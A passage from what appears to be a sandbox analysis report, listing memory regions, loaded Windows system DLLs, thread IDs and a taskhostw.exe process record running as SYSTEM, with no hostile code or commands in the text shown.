monitored = 0
entry_point = 0x7ff85c6f2760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 2224
start_va = 0x7ff85d350000
end_va = 0x7ff85d3a5fff
monitored = 0
entry_point = 0x7ff85d360bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 2225
start_va = 0x2180000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 2226
start_va = 0x7ff857e20000
end_va = 0x7ff857e2bfff
monitored = 0
entry_point = 0x7ff857e214d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 2227
start_va = 0x7ff857df0000
end_va = 0x7ff857e16fff
monitored = 0
entry_point = 0x7ff857df3bf0
region_type = mapped_file
name = "profsvcext.dll"
filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll")
Region:
id = 2228
start_va = 0x7ff85f620000
end_va = 0x7ff85f67bfff
monitored = 0
entry_point = 0x7ff85f63b720
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2229
start_va = 0x7ff85fd40000
end_va = 0x7ff86129efff
monitored = 0
entry_point = 0x7ff85fea11f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2230
start_va = 0x7ff85e3c0000
end_va = 0x7ff85e402fff
monitored = 0
entry_point = 0x7ff85e3d4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2231
start_va = 0x7ff85e5a0000
end_va = 0x7ff85ebe3fff
monitored = 0
entry_point = 0x7ff85e7664b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 2232
start_va = 0x7ff857db0000
end_va = 0x7ff857dedfff
monitored = 0
entry_point = 0x7ff857dba050
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 2233
start_va = 0x7ff85d450000
end_va = 0x7ff85d45bfff
monitored = 0
entry_point = 0x7ff85d4527e0
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 2234
start_va = 0x7ff85d7a0000
end_va = 0x7ff85d7befff
monitored = 0
entry_point = 0x7ff85d7a5d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 2235
start_va = 0x7ff85f4b0000
end_va = 0x7ff85f501fff
monitored = 0
entry_point = 0x7ff85f4bf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2236
start_va = 0x7ff85e410000
end_va = 0x7ff85e4c4fff
monitored = 0
entry_point = 0x7ff85e4522e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2237
start_va = 0x7ff85cfe0000
end_va = 0x7ff85d003fff
monitored = 0
entry_point = 0x7ff85cfe3260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 2238
start_va = 0x2280000
end_va = 0x237ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 2239
start_va = 0x7ff857cc0000
end_va = 0x7ff857da5fff
monitored = 0
entry_point = 0x7ff857cdcf10
region_type = mapped_file
name = "usermgr.dll"
filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll")
Region:
id = 2240
start_va = 0x7ff859cb0000
end_va = 0x7ff859de5fff
monitored = 0
entry_point = 0x7ff859cdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 2241
start_va = 0x2380000
end_va = 0x247ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002380000"
filename = ""
Region:
id = 2242
start_va = 0x5e0000
end_va = 0x5e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 2243
start_va = 0x5e0000
end_va = 0x5e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 2244
start_va = 0x7ff857c70000
end_va = 0x7ff857cb0fff
monitored = 0
entry_point = 0x7ff857c74840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Region:
id = 2245
start_va = 0x7ff85c470000
end_va = 0x7ff85c477fff
monitored = 0
entry_point = 0x7ff85c4713e0
region_type = mapped_file
name = "dabapi.dll"
filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll")
Region:
id = 2246
start_va = 0x7ff857c50000
end_va = 0x7ff857c6ffff
monitored = 0
entry_point = 0x7ff857c539a0
region_type = mapped_file
name = "locationwinpalmisc.dll"
filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll")
Region:
id = 2247
start_va = 0x7ff85ca20000
end_va = 0x7ff85ca46fff
monitored = 0
entry_point = 0x7ff85ca27940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2248
start_va = 0x5e0000
end_va = 0x5e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 2249
start_va = 0x7ff857c10000
end_va = 0x7ff857c46fff
monitored = 0
entry_point = 0x7ff857c16020
region_type = mapped_file
name = "gnssadapter.dll"
filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll")
Region:
id = 2250
start_va = 0x7ff857bb0000
end_va = 0x7ff857c04fff
monitored = 0
entry_point = 0x7ff857bb3fb0
region_type = mapped_file
name = "policymanager.dll"
filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")
Region:
id = 2251
start_va = 0x7ff857b90000
end_va = 0x7ff857ba9fff
monitored = 0
entry_point = 0x7ff857b92cf0
region_type = mapped_file
name = "locationpelegacywinlocation.dll"
filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll")
Region:
id = 2252
start_va = 0x7ff85fb50000
end_va = 0x7ff85fc92fff
monitored = 0
entry_point = 0x7ff85fb78210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2255
start_va = 0x7ff857940000
end_va = 0x7ff857955fff
monitored = 0
entry_point = 0x7ff857941b60
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2256
start_va = 0x2480000
end_va = 0x257ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002480000"
filename = ""
Region:
id = 2257
start_va = 0x7ff857910000
end_va = 0x7ff85793dfff
monitored = 0
entry_point = 0x7ff857917550
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 2258
start_va = 0x7ff85db20000
end_va = 0x7ff85db40fff
monitored = 0
entry_point = 0x7ff85db30250
region_type = mapped_file
name = "joinutil.dll"
filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll")
Region:
id = 2259
start_va = 0x7ff8578f0000
end_va = 0x7ff857900fff
monitored = 0
entry_point = 0x7ff8578f7ea0
region_type = mapped_file
name = "dcpapi.dll"
filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll")
Region:
id = 2260
start_va = 0x7ff8578c0000
end_va = 0x7ff8578e4fff
monitored = 0
entry_point = 0x7ff8578d2f20
region_type = mapped_file
name = "wificonnapi.dll"
filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll")
Region:
id = 2261
start_va = 0x7ff857800000
end_va = 0x7ff857838fff
monitored = 0
entry_point = 0x7ff857809c90
region_type = mapped_file
name = "aepic.dll"
filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll")
Region:
id = 2262
start_va = 0x7ff8577e0000
end_va = 0x7ff8577f0fff
monitored = 0
entry_point = 0x7ff8577e3e10
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll")
Region:
id = 2263
start_va = 0x7ff859920000
end_va = 0x7ff859ca1fff
monitored = 0
entry_point = 0x7ff859971220
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 2264
start_va = 0x7ff8577c0000
end_va = 0x7ff8577d2fff
monitored = 0
entry_point = 0x7ff8577c57f0
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 2265
start_va = 0x7ff857700000
end_va = 0x7ff8577b0fff
monitored = 0
entry_point = 0x7ff8577788b0
region_type = mapped_file
name = "cellularapi.dll"
filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll")
Region:
id = 2266
start_va = 0x7ff857820000
end_va = 0x7ff857831fff
monitored = 0
entry_point = 0x7ff857829260
region_type = mapped_file
name = "rilproxy.dll"
filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll")
Region:
id = 2267
start_va = 0x7ff8575c0000
end_va = 0x7ff85766dfff
monitored = 0
entry_point = 0x7ff8575d80c0
region_type = mapped_file
name = "windows.networking.connectivity.dll"
filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll")
Region:
id = 2268
start_va = 0x2580000
end_va = 0x267ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 2269
start_va = 0x7ff8575a0000
end_va = 0x7ff8575b6fff
monitored = 0
entry_point = 0x7ff8575a5630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2270
start_va = 0x5f0000
end_va = 0x5f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005f0000"
filename = ""
Region:
id = 2271
start_va = 0x2680000
end_va = 0x277ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 2272
start_va = 0x7ff856d30000
end_va = 0x7ff856d3bfff
monitored = 0
entry_point = 0x7ff856d32830
region_type = mapped_file
name = "bi.dll"
filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll")
Region:
id = 2273
start_va = 0x2780000
end_va = 0x297ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 2274
start_va = 0x2800000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2275
start_va = 0x2900000
end_va = 0x29fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 2282
start_va = 0x1d00000
end_va = 0x1d7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 2283
start_va = 0x7ff85c690000
end_va = 0x7ff85c6abfff
monitored = 0
entry_point = 0x7ff85c6937a0
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 2284
start_va = 0x1d80000
end_va = 0x1dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d80000"
filename = ""
Region:
id = 2285
start_va = 0x7ff85c6b0000
end_va = 0x7ff85c6e1fff
monitored = 0
entry_point = 0x7ff85c6bb0c0
region_type = mapped_file
name = "shacct.dll"
filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll")
Region:
id = 2286
start_va = 0x7ff856990000
end_va = 0x7ff856a2afff
monitored = 0
entry_point = 0x7ff856997220
region_type = mapped_file
name = "settingsync.dll"
filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll")
Region:
id = 2287
start_va = 0x1060000
end_va = 0x1061fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001060000"
filename = ""
Region:
id = 2288
start_va = 0x7ff857960000
end_va = 0x7ff8579c3fff
monitored = 0
entry_point = 0x7ff857975ae0
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 2289
start_va = 0x1c00000
end_va = 0x1cdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 2290
start_va = 0x2580000
end_va = 0x267ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 2291
start_va = 0x7ff856760000
end_va = 0x7ff856770fff
monitored = 0
entry_point = 0x7ff8567628d0
region_type = mapped_file
name = "credentialmigrationhandler.dll"
filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll")
Region:
id = 2292
start_va = 0x2a00000
end_va = 0x2afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 2293
start_va = 0x2780000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 2294
start_va = 0x2a00000
end_va = 0x2afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 2295
start_va = 0x7ff857840000
end_va = 0x7ff8578b9fff
monitored = 0
entry_point = 0x7ff857867630
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 2296
start_va = 0x7ff8566c0000
end_va = 0x7ff856759fff
monitored = 0
entry_point = 0x7ff8566dada0
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 2392
start_va = 0x7ff85dea0000
end_va = 0x7ff85df38fff
monitored = 0
entry_point = 0x7ff85decf4e0
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 2393
start_va = 0x1070000
end_va = 0x1071fff
monitored = 0
entry_point = 0x1075630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2394
start_va = 0x1080000
end_va = 0x1084fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 2396
start_va = 0x7ff856c20000
end_va = 0x7ff856cdffff
monitored = 0
entry_point = 0x7ff856c4fd20
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 2397
start_va = 0x1090000
end_va = 0x1090fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001090000"
filename = ""
Region:
id = 2403
start_va = 0x7ff856600000
end_va = 0x7ff85660dfff
monitored = 0
entry_point = 0x7ff856601460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 2404
start_va = 0x7ff8565a0000
end_va = 0x7ff8565f1fff
monitored = 0
entry_point = 0x7ff8565a38e0
region_type = mapped_file
name = "proximityservice.dll"
filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll")
Region:
id = 2405
start_va = 0x7ff856570000
end_va = 0x7ff85659cfff
monitored = 0
entry_point = 0x7ff856572290
region_type = mapped_file
name = "proximitycommon.dll"
filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll")
Region:
id = 2406
start_va = 0x7ff856560000
end_va = 0x7ff856568fff
monitored = 0
entry_point = 0x7ff856561ed0
region_type = mapped_file
name = "proximitycommonpal.dll"
filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll")
Region:
id = 2407
start_va = 0x7ff856ce0000
end_va = 0x7ff856d17fff
monitored = 0
entry_point = 0x7ff856cf8cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2408
start_va = 0x7ff856550000
end_va = 0x7ff85655ffff
monitored = 0
entry_point = 0x7ff856551700
region_type = mapped_file
name = "proximityservicepal.dll"
filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll")
Region:
id = 2409
start_va = 0x7ff85e330000
end_va = 0x7ff85e3b5fff
monitored = 0
entry_point = 0x7ff85e33d8f0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 2410
start_va = 0x7ff85cb20000
end_va = 0x7ff85cb51fff
monitored = 0
entry_point = 0x7ff85cb32340
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 2486
start_va = 0x2b00000
end_va = 0x2bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 2500
start_va = 0x7ff85cfd0000
end_va = 0x7ff85cfdbfff
monitored = 0
entry_point = 0x7ff85cfd2790
region_type = mapped_file
name = "hid.dll"
filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")
Region:
id = 2501
start_va = 0x1070000
end_va = 0x1071fff
monitored = 0
entry_point = 0x1075630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2502
start_va = 0x1080000
end_va = 0x1084fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 2552
start_va = 0x2b00000
end_va = 0x2b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 2562
start_va = 0x1070000
end_va = 0x1070fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001070000"
filename = ""
Region:
id = 2578
start_va = 0x1070000
end_va = 0x1070fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001070000"
filename = ""
Region:
id = 2631
start_va = 0x2b80000
end_va = 0x2d7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b80000"
filename = ""
Region:
id = 2632
start_va = 0x2c00000
end_va = 0x2cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c00000"
filename = ""
Region:
id = 2702
start_va = 0x2d00000
end_va = 0x2dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d00000"
filename = ""
Region:
id = 2703
start_va = 0x7ff85c500000
end_va = 0x7ff85c685fff
monitored = 0
entry_point = 0x7ff85c54d700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 2704
start_va = 0x1070000
end_va = 0x1073fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2705
start_va = 0x13a0000
end_va = 0x13e4fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db")
Region:
id = 2706
start_va = 0x1080000
end_va = 0x1083fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2707
start_va = 0x2e00000
end_va = 0x2e8dfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 2709
start_va = 0x7ff855800000
end_va = 0x7ff855843fff
monitored = 0
entry_point = 0x7ff85580c010
region_type = mapped_file
name = "execmodelclient.dll"
filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll")
Region:
id = 2710
start_va = 0x7ff85bfc0000
end_va = 0x7ff85c07dfff
monitored = 0
entry_point = 0x7ff85c002d40
region_type = mapped_file
name = "coremessaging.dll"
filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll")
Region:
id = 2711
start_va = 0x1090000
end_va = 0x1090fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001090000"
filename = ""
Region:
id = 2712
start_va = 0x7ff858270000
end_va = 0x7ff8582b9fff
monitored = 0
entry_point = 0x7ff85827ac30
region_type = mapped_file
name = "deviceaccess.dll"
filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")
Region:
id = 2713
start_va = 0x2e90000
end_va = 0x2f8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e90000"
filename = ""
Thread:
id = 149
os_tid = 0x364
Thread:
id = 150
os_tid = 0x384
Thread:
id = 151
os_tid = 0x3d8
Thread:
id = 152
os_tid = 0x144
Thread:
id = 153
os_tid = 0x148
Thread:
id = 154
os_tid = 0x14c
Thread:
id = 155
os_tid = 0x18c
Thread:
id = 156
os_tid = 0x174
Thread:
id = 157
os_tid = 0x16c
Thread:
id = 158
os_tid = 0x168
Thread:
id = 159
os_tid = 0x1c8
Thread:
id = 160
os_tid = 0x1b0
Thread:
id = 161
os_tid = 0x20c
Thread:
id = 162
os_tid = 0x258
Thread:
id = 163
os_tid = 0x284
Thread:
id = 164
os_tid = 0x290
Thread:
id = 165
os_tid = 0x2ac
Thread:
id = 166
os_tid = 0x2d0
Thread:
id = 167
os_tid = 0x2f0
Thread:
id = 168
os_tid = 0x404
Thread:
id = 169
os_tid = 0x41c
Thread:
id = 170
os_tid = 0x430
Thread:
id = 171
os_tid = 0x444
Thread:
id = 172
os_tid = 0x47c
Thread:
id = 173
os_tid = 0x4d8
Thread:
id = 174
os_tid = 0x50c
Thread:
id = 175
os_tid = 0x534
Thread:
id = 193
os_tid = 0x4b0
Thread:
id = 197
os_tid = 0x514
Thread:
id = 201
os_tid = 0x5d8
Thread:
id = 209
os_tid = 0x608
Thread:
id = 227
os_tid = 0x68c
Thread:
id = 229
os_tid = 0x6a0
Process:
id = "8"
image_name = "taskhostw.exe"
filename = "c:\\windows\\system32\\taskhostw.exe"
page_root = "0x329cf000"
os_pid = "0x474"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "child_process"
parent_id = "7"
os_parent_pid = "0x360"
cmd_line = "taskhostw.exe SYSTEM"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000aea9" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 2297
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2298
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2299
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2300
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2301
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2302
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2303
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2304
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2305
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2306
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2307
start_va = 0x7ff67cd20000
end_va = 0x7ff67cd38fff
monitored = 0
entry_point = 0x7ff67cd259b0
region_type = mapped_file
name = "taskhostw.exe"
